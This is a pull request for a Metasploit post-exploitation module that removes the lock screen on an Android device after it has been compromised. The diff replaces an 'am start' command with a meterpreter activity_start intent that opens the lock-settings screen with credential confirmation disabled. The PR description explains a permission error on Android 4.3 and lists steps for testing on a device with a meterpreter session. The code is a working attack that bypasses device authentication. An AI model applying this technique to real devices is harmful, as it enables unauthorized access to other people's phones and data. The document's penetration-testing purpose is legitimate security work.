### PR TITLE
fix Android remove_lock to work with 4.3 devices

### DIFF
--- a/modules/post/android/manage/remove_lock.rb
+++ b/modules/post/android/manage/remove_lock.rb
@@ -63,13 +63,12 @@ class Metasploit4 < Msf::Post
       return
     end
 
-    output = cmd_exec('am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task')
-    if output =~ /Error:/
-      print_error("The Intent could not be started")
-      vprint_status("Command output: #{output}")
-    else
+    result = session.android.activity_start('intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end')
+    if result.nil?
       print_good("Intent started, the lock screen should now be a dud.")
       print_good("Go ahead and manually swipe or provide any pin/password/pattern to continue.")
+    else
+      print_error("The Intent could not be started: #{result}")
     end
   end
 


### PR DESCRIPTION
As spotted in https://github.com/rapid7/metasploit-framework/pull/5416 on Android 4.3 the `am start` command gives 
`java.lang.SecurityException: Permission Denial: startActivity asks to run as user -2 but is calling from user 0; this requires android.permission.INTERACT_ACROSS_USERS_FULL`
This change fixes the error by using the Android activity_start command and fixes remove_lock on 4.3 devices.
- [x] Get a meterpreter session on an Android 4.3 device with a lock screen set.
- [x] use post/android/manage/remove_lock and ensure the lock screen is removed.
